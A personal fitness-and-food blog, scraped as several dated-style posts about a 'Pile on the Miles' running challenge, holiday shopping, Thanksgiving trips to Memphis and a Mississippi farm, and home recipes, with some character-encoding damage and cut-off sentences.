It’s that time again
Time to “Pile on the Miles”. I have been doing this challenge since 2008 and this year Monica from Run Eat Repeat is organizing it. I am fully supporting it and hope you are all in for the challenge too!! The holidays get so busy and this is the perfect time of year to get out and run out stress and those extra little sweets we all enjoy.

]]>Went out shopping yesterday after my hour kickboxing class, I think I burned like a million calories after walking around for hours and hours. Good thing I had a McCormick McGriddle!
Kickboxing was intense I am going to post tonight about this GREAT workout!

I hit up the Mills out here, which has basically every store and if it’s not there the you can go right across the way to the Victoria Gardens. I think I must look like an easy catch because yesterday I kept getting SUCKED in to all the kiosk people. The first one literally grabbed me, sat me down and kept saying ” 10 minutes 10 dollars (in an Asian accent)”. He wanted me to get a massage, I was set in saying no but then he insisted and I needed one so I caved in! lol….
I got some great deals and Old Navy, Gap, Bath and Body Works, and Marshall’s. I started getting dizzy at around one O’ Clock so I hit up the food court. I hit up the healthiest choice I could find and got a turkey apple salad minus the bacon. Instead of chips on the side I had a bowl of tomato soup. As I looked around the GINORMOUS food court I think I was the ONLY one eating a salad, a year ago I would have been eating Chinese food for sure.


It’s so much fun shopping for other people, there is a joy that I find in finding that perfect gift. So what is the perfect gift? Well I think homemade things are wonderful, but I know my little bro’s aren’t down with me making them a scarf, so the perfect gift for them is something that they like that I took the time to pick out (like cloths and video games). There are a lot of perfect gifts out there, but is there a perfect gift for everyone?
Shopping was done around 5:30 and I still needed to hit up the grocery store, so I rushed off so I could make it home on time to make dinner. Before I rushed off I grabbed a small Strawberry Nirvana smoothie from Jamba Juice, because I didn’t want to go shopping on an empty stomach. I am glad I had a shopping list because my grocery shopping was painless. I finished around 7 and finally headed home!!!!
I wish I could have worn a pedometer, I think I must have walked like 30 miles! When I got home I showed hubby all my fun finds, and he was thrilled. He was also in the middle of a MAJOR organization project in the garage, Mr. OCD! lol…. Here is a picture of the things that I got for FREE! I didn’t purchase anything for myself, just took advantage of some freebies.



SUNDAY TREE DAY & LAST DAY OF POTM
This morning I made the most amazing french toast casserole. I had been planning on making this next weekend and then I saw Megs post and had to make it today!!! I saw a recipe in Cooking Light Magazine and played around with it a little.
Cran-Apple French Toast Casserole (my new name for it)
Ingredients:
3 eggs + 2 egg whites
1 tbs butter
1 cup diced apple
cinnamon
1/4 c brown sugar
4 slices of whole wheat bread cut into small squares
1/4 cup dried cranberry’s
1/2 cup apple cider
1/2 cup non fat milk
1/4 cup fresh cranberry sauce
a little nutmeg
sliced almonds for topping
1. Preheat oven to 400 degrees
2. Melt butter in pot and apples and stir for ten minutes. Then add 2 tablespoons of brown sugar, cinnamon, and nutmeg.
3.Spray pie pan with non-stick Pam and lay down bread squares to cover the bottom.
4. Sprinkle dried cranberries on bread along with apple mixture. Combine apple cider with the next 4 ingredients plus all of the eggs whisk together, and pour on top of bread mixture sprinkle with remaining brown sugar.
5. Sprinkle with almonds and bake for 30-35 minutes until golden.
This was super yummy and I will be making it for Christmas breakfast with the family!!!!

On our one hour layover, we ate at this nice restaurant in the Phoenix airport can’t remember the name it’s famous for it’s whiskey ( something I DO NOT enjoy, a bad college experience). I had a Lobster Salad, loved it..and I snuck a few of hubby’s fries of course. There was a lot of egg on it, I only ate one half because the egg was also shopped up all over the salad.

THERE’S NO PLACE LIKE HOME
My wonderful mother picked us up from the airport, and I was hoping we could just hang out at her place and have leftovers, sadly they had NONE!!! Four boys and a father will do that to you.
I snacked on a 1/4 of a Cherry Pretzel PROBAR ( it was dinner time for us even though it was onnly 3pm), this one was good but a little too salty for me. When we got home, Bosco was so thrilled to see us, or should I say we were so THRILLED to see him! The minuet we opend the front door I was suprised with several boxes on the porch, goodies for the POTM challenge!
IT’S BEGINNING TO LOOK A LOT LIKE CHRISTMAS
We settled in and hubby already got to the laundry, that’s right he’s a little OCD like that, but that’s why I love him;) Like hubby like wifey the minuet we walked in, I started cleaning out the fridge and the pantry to make a grocery list for the week. There is something about a clean fridge that is invigorating. Call me crazy but I love to clean out my fridge, what makes you feel invigorated? After the fridge and pantry were done, I started putting away all the fall decorations and hubby brought out the SIX boxes of Christmas decorations, what can I say I LOVE CHRISTMAS! When I was a kid we would all get to decorate the tree while drinking hot coco and watching White Christmas. Did you, or do you have decorating family traditions? I got everything up, and when we get our tree tomorrow I will take pics so you can see how festive it all looks!
ACCOMPLISHED
Not only did I clean, and decorate, I also made our first home made meal in a WEEK ( Thanksgiving was homemade just not our home). I didn’t have a lot to work with so I just kept it simple, I am going shopping in the morning. For hubby it was turkey sloppy joes and mac and cheese, and for me a sweet potato sloppy joe. After dinner I sipped on a hot cup of cider and started major planning the MONTH of December. With all the wonderful Holiday traditions it’s hard to keep track sometimes of what all is happening. There are no women’s studies this month which leaves Wednesday nights FREE, which means more time to bake and to write my Christmas cards. I think I got everything on the calender from, work parties, to work outs, to cookie exchanges! This year my bff is having a cookie exchange at her house, I have always wanted to go to one of these and now I get to!!! Any cookies suggestions?

This week I already have two Christmas parties and a couples study at my house !!! MAN I am already pooped thinking about it, but once again I WILL not BE stressed! I WILL NOT! I plan on having a lot of quite time this week to be ready to take on whatever the day has layed out for me:) God is good!
Sweet Potato Soufflé
As promised here is the recipe for the wonderful healthy Sweet Potato Soufflé I made for Thanksgiving.

Sweet Potato Soufflé
This recipe serves: 10
4 large sweet potatoes
2 tablespoons olive oil
1/2 cup skim milk
1/2 cup dry sherry
1/2 cup brown sugar
1/2 cup frozen orange juice from concentrate
1 teaspoon nutmeg
1 teaspoon cloves
1 teaspoon cinnamon
1 pinch salt
4 large egg whites
2 tablespoons sugar
2 oranges cut in thin slices
1. Preheat oven to 350°F.
2. In a large pot, cover the sweet potatoes with water and bring to a boil. Boil until tender.
3. Drain and peel the potatoes and place in a large mixing bowl. Mash well.
4. Add the olive oil, milk, sherry, brown sugar, orange juice, nutmeg, cloves, cinnamon and salt. Beat well with a mixer.
5. Spoon mixture into an oiled ,ovenproof gratin dish.
6. Bake until the potatoes are hot, about 25 minutes.
7. While the soufflé is cooking, make the meringue. In a clean bowl, whip egg whites until almost stiff. Gradually add the sugar and continue to beat until soft peaks form.
8. During the last five minutes of cooking the soufflé, top with the meringue mixture.
9. Return to oven and remove when the meringue is lightly browned. Garnish with the sliced oranges.

FIL AKA Benton, uses a true “southern” band aid
Here is a picture of the feast, I had two plates. The first one had a little stuffin (or dressing as they call it in the south), cranberry’s, purple hole peas, mashed taters, olives, celery, and come sweet pickles. All veggies were grown in FIL’s garden. I skipped the rolls I knew I already had enough starch on my plate! I missed some good Ole yams! As you can see for dessert, I had some cobbler with a little light cool whip, and a bite of this cherry pie! Hubby has a very small family, at this feast it was his dad, his dad’s girl friend Sam, her daughter Dana, hubby and I. I am not used to this at all the TRUJIILLO-CLASBY clan, is huge!!! I hope to have lot’s of little one’s to add to this clan, one day not any day soon:)

After dinner, we went out to the farm to feed the goats, birds, and many dogs! I love visiting the farm, that’s right just visiting!!! I am a city girl kinda.

We left at 5pm and had to drive 5 hours back to Nashville to the SIL’s, here is a what hubby and I did to entertain ourselves!!!! This video is a PG-13 there are some others out there that were questionable.
Thanksgiving dinner #2
Before we hit the kitchen this morning, I ran a 11 mile run, on Stones River Battle field, SIL was so sweet to find it for me!!! How cool is that! The park was lined with REAL HISTORY, I could not have been more happy anywhere else. It was such a great run, I had two pieces of toast with PB before I left, and stopped by Sbux for a dopio espresso for a good kick. I brought my Hammer gel, and a bottle water ( did not want a Tuesday repeat). I also had a recovery drink from Camelback for after the run. The park was lovely, lots of trails, and lots of people. Which was nice because I didn’t know the area very well and didn’t want to be stranded. The whole run I was encouraged knowing that all you lovely ladies were out there POTM with me! YOU ROCK!

Here is all of the yummy food! I made a sweet potato souffle with a mirange topping! I will post the recipe later because it will now be a staple in our house!

Turkey, sweet potatoes, a little dressing, cream cheese corn, purple hole peas, mac and cheese, one deviled egg (that’s a first for me), green bean casserole and some mashed taters. As you can see southerners aren’t into SALAD!!! We had dinner at 12:30pm so we had seconds for dinner forgot to take pics, was a much smaller plate.

Also I had a small piece of a NO PUDGE brownie, and pecan pie.
Didn’t finish the pie but ate the whole brownie!!! I had a small cup of black coffee too, which was perfect to balance out the sweetness.

SOUTHERN EATING #5
Hubby and I went to Hueyâ€
s this afternoon to meet up with some old college friends. I thought we were going to DIE on the way there because Memphis drivers are crazy, and I thought California drivers were bad. I love Hueyâ€
s, itâ€
such a fun and relaxing atmosphere and I hear they have great burgers. I am not a big hamburger eater, and because we have eaten out a lot already I wanted to be a little good. I ordered a side salad and a West Coast burger, go figure. It had a wheat bun, onion and guacamole. I asked for bbq on the side because they have some of the best bbq sauce around! The turkey burger was HUGE, probably had just as much FAT as a regular burger none the less it was yummy!



I miss Big B and Jenny. Big B was my best guy friend in college and because he is 6â€
11 he protected me like a big brother! Jenny and I trained for my first marathon together but because of conflicting schedule she wasnâ€
t able to finish, but she was the only one at the finish line that came to support ME!!! THANKS JENNY!
CASHING IN OUR WINNINGS
A couple of week ago I received 5 free smoothies, from SMOOTHIE KING, thanks KERF for doing the contest! Hubby and I made a smoothie trip and I got a small mocha smoothie and hubby got a kiwi and strawberry smoothie! We saved them for our dinner dessert.

SOUTHERN EATING #6
Sadly it was our last night in Memphis, before we head out to Mississippi to the FILâ€
s farm. Thatâ€
s right my FIL lives on a freaking huge FARM! He has a huge garden with corn, purple hole peas, squash, cabbage, and so so much more! He also has goats, and 2 huge dogs! I remember the first time I visited we drove around his farm and he had all these beautiful fields of grass and he told me how the dear came and ate at it, I thought that was cute until he told me that in exchange he got to have dear for DINNER!!! Lol…I was so naive.
Anyways back to eating, we had dinner with my college roomy Jess and her fiancé Josiah. It was so nice to catch up and hear about all their fun wedding plans. I am so happy for her and I canâ€
t wait to come back in March for their big day!!! We ate at one of my very favorite restaurants, The American Café. I was tempted to try something different but I went with my usual, the Hawaiian Chicken Salad! It has lots of yummy grilled chicken, walnuts, pineapple, an orange right in the middle, coconut, and a skewer of shrimp on top. Not just good but pretty also! I love the presentation of food too, do any of you appreciate that too? I also had two glassed of Pinot Noir, hey I am on vacation and I had a SALAD for dinner!!!



FREAKY FRIDGE
Ok let me just start with this, I love my MIL (mother in law) she is great! Hubby and I were blessed to stay at her house in Memphis this week, thank you Mary. Well I needed something from the freezer and when I went to open it (this is the extra freezer in the garage) we found this.

She lives alone, why does she need this much food? I think it is because she is storing up in case of emergency. Otherwise why in the world would she have this MUCH food! Hubby says that she says “they were on sale and just in case she might need themâ€. WOW thatâ€

HOME ALONE LIKE
When I got done with breakfast I was running around frantically trying to get everything together for my trip. I Miss my hubby, he so good at getting everything taken care for the house before we leave on trips. Donâ€

s just nice to have his support! After loading all the bags in the car, and getting Bosco stuff together to head to his grandparents house it was 11:40 and my plane was leaving at 12:55…needless to say I was stressing. I made it to the airport fine, thanks to my Step Dad Richard, thanks RICH! I thought I was going to have to chase after the plane like the movie HOME ALONE! Got on the plane, and even had a few minutes to spare, and this is where a funny little story comes in.
I GOT HIT ON
As I was going through the security gate this nice gentleman (so I thought at the time) decided to HIT on me. He first gave the line “I think I know you from somewhere†and as SWEET as I am I said “really where are you from†he said, “aroundâ€. Ok now I was catching on. He then proceeded to speak and said, “Youâ€

t you†WHAT man how did he know is he a profiler! Lol…being the nice person that I am I said yes and then hoped he would just go away oooo but no he continued to flirt with me. “ If youâ€

Now I am sitting in Las Vegas waiting to board my plane to Nashville and thought I would give you all my plan for working out this week(this is more for me because I need the accountability).
Sunday: REST
Monday: Run 5 miles easy, go to my old AKB class
Tuesday: Run 5 miles 2 miles at Tempo, yoga in the AM
Wednesday: Run 7 miles 3 miles at tempo, go to old AKB class
Thursday morning: I AM RUNNING 10 miles at least, I was going to do a 5k Turkey Trot but I need to run more then 3 miles.
Friday: headed back home, walk in the evening with Bosco and Hubby
Saturday: Spin Class and weights
Sunday: AKB at night
I know this seems like a lot but with more time and more food comes more working out!!! I ate the second half of my Apple Chicken Pumpadilla on the plane, mmmm…just as good as last night.

]]>SCHOOL THANKSGIVING FEAST
We had a wonderful Thanksgiving feast at school. There was vegetable soup, corn chowder, and cornbread. Last year I ate too much corn chowder and got sick so this year I stuck to the vegetable soup and had small sample corn chowder.


PROBAR #2 Apple Cinnamon Crunch
Hubby left for Nashville today. I sent him off with some treats, including an Apple Cinnamon PROBAR. Here is hubbyâ€
s review all the way from Nashville:

“It didn’t taste like apple cinnamon, it tasted like cherry-something.Texture was good but still couldn’t get over the cherry-ish flavor bar was big,so that was nice. But with the grams of fat being so high, I would have rather had a good-ol’ Snicker bar which tastes exactly what a Snicker bar should tastelike.â€
That is one thing I need to research, because I feel like there is A LOT of fat in these bars?

s BSI . Well I love pumpkin, but hate pumpkin pie, I know itâ€
s weird. I wanted to come up with something original and creative. It was hard because I felt like everyone else has already done everything I was trying to come up with. I like to use everything I already have on hand, so with out further ado here it is:
Chicken and Apple Pumpadillas ( yes a pumpkin quesadilla)
Ingredients:
1 chicken breast
Salt
Pepper
Dash of Chili powder
Dash of Cinnamon
¼ cup black beans
¼ cup sour cream
½ cup of pumpkin puree
¼ cup of shredded cheese
2 8inch whole wheat tortillas
1 sliced small apple
Preparation:
1,Preheat the oven to 400 degrees. Coat a baking sheet with cooking spray.
2. Coat a larger nonstick skillet with cooking spray and set it over medium heat. Sprinkle salt and pepper on chicken. Cook chicken breast on both sides for about 5 minute on each side.
3.In a small bowl mash the beans, sour cream, chili powder, and cinnamon. In another bowl stir together pumpkin and cheese.
4.Spread the bean mixture on one of the tortillas, and the pumpkin mixture on the other. Then arrange the chicken and sliced apple on top of the bean mixture and then put the other on top to form a sandwich. Place on the baking sheet and bake until the tortillas are crisp, 5-6 minutes. Cut in to wedges and enjoy!!!
I know it looks weird but the cinnamon and chili pepper were a perfect match and so was the pumpkin and cheese!





OOO this was by far the best BSI meal I have come up with!!! I thought I would need salsa but not need!
PILE ON THE MILES SNEAK PEEK AND UPDATE
Ok so today after I finished my BSI recipe I stepped outside and found a very nice SURPRISE!!!! Thank you CAMELBACK!!!! I am so excited about all that they sent me, in support of the POTM. I will be doing a review on these bottles soon, and hosting a giveaway so keep your eyes peeled.

LEAVING ON A JET PLANE
I love plane rides and road trips. For me itâ€
